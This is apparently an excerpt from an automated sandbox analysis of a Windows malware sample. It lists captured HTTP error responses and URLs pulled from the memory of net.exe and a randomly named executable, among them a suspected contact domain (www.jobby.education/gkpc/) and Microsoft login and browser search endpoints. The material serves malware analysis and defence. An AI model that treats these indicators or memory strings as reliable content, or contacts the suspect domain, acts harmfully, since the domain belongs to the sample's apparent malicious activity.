                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:04:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:04:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:04:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:04:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 06 Feb 2025 08:05:23 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 06 Feb 2025 08:05:25 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 06 Feb 2025 08:05:28 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Feb 2025 08:05:30 GMTContent-Type: text/htmlContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:05:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HRFwBpQjfrovaLXP7xndc9xYPpwTaqiPzAzTjyA5uyrpdE677G48kPbC8Lcz8ombLZB%2FKd4fhTloVZ%2B%2FKYb%2FoIKHQKVMXRSQQdsXa3FonBsjjoy7PmUYPRLa4koc%2BkvBGXgkWMgG%2Fcs14as%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d9a33859f4c358-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=773&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a Data Ascii: 13
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:05:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gfJUdrERFo0hJlK3fUTcZxwHW32QCOSh4dqMycibZClfQtBSFUSLi714km2d6iXHxxgcyR9oqDb502bhwncqKYOdBInjFQOvSEezjus5F3WGNlO5Y0Nz1PJJM2%2BEedlR8ZVvRpJNTXExx9s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d9a3486ba14414-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1646&rtt_var=823&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1786&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 32 66 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 59 97 a3 4a 72 7e bf bf 42 ae 39 b6 67 0e 5d cd 2e a0 6e 55 db 80 10 20 09 04 48 48 42 2f f7 24 90 2c 62 15 bb e4 33 3f c8 7f c3 bf cc 47 55 bd 54 57 49 dd 7d 67 fc e0 7c 28 91 99 11 91 91 b1 7c 41 65 f2 db 6f bf 3d fe cb 64 29 ae 1d 43 1a 45 4d 96 7e fa ed f1 e5 67 34 1a 8d 1e 23 08 fc cf 8f 19 6c c0 28 6a 9a f2 1e 1e db b8 7b ba 13 8b bc 81 79 73 df 9c 4a 78 37 f2 5e 7a 4f 77 0d 1c 1a f4 22 e2 f7 91 17 81 aa 86 cd 53 db 04 f7 ec dd 4d 39 c0 8b e0 fd 85 bf 2a d2 57 82 f2 e2 de bb 4c dd 64 34 2a 10 66 e0 cf 70 48 43 19 57 b0 7e c5 82 7d 47 9b 83 0c 3e dd 75 31 ec cb a2 6a 5e 91 f5 b1 df 44 4f 3e ec 62 0f de 3f 77 3e 8c e2 3c 6e 62 90 de d7 1e 48 e1 13 fe f1 ab a8 26 6e 52 f8 89 c2 a8 91 5e 34 a3 69 d1 e6 fe 23 fa 32 f8 42 50 37 a7 14 8e 2e 76 fb 6c 2e af ae 3f 33 5f 9a 5b f8 a7 d1 7f 7d ed 5e 5a 50 e4 cd 7d 00 b2 38 3d 3d 8c f8 2a 06 e9 87 91 02 d3 0e 36 b1 07 3e 8c 6a 90 d7 f7 35 ac e2 e0 f7 f7 6c 75 7c 86 0f 23 9c 2a 87 ef 27 d3 38 87 f7 11 8c c3 a8 79 18 e1 1f 29 82 a5 19 9c 22 b8 ef a9 Data Ascii: 12ffZYJr~B9g].nU HHB/$,b3?GUTWI}g|(|Aeo=d)CEM~g4#l(j{ysJx7^zOw"SM9*WLd4*fpHCW~}G>u1j^DO>b?w><nbH&nR^4i#2BP7.vl.?3_[}^ZP}8==*6>j5lu|#*'8y)"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:05:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OvXLRWehCtl7ekT2h%2FbVc%2F0w%2FzVDIeISq0gK3czWypN37Ht9aYqrgdsnUkDGQsEQmK2FkSG3HB4uclLdq8C6%2FQ8R1a8U81d1gTzAASilDoKPDHa719k%2F8zXqcoiUQuCRnWL11o84BVa1gDI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d9a3594f9cde95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=476&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: net.exe, 0000000B.00000002.4655359718.0000000004856000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003906000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4655930930.0000000004BAB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jobby.education
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4655930930.0000000004BAB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jobby.education/gkpc/
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fburl.com
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Source
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 0000000B.00000003.2825701084.00000000078DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033v
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nl.trustpilot.com/review/www.transip.nl
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://optimize.google.com
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://td.doubleclick.net
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://trustpilot.com/review/www.transip.nl
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: net.exe, 0000000B.00000002.4655359718.0000000004B7A000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003C2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googleanalytics.com
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googleoptimize.com
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/5885/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/zoeken/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/privacy-policy/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/100000230
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000577/
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/services/search-domains/
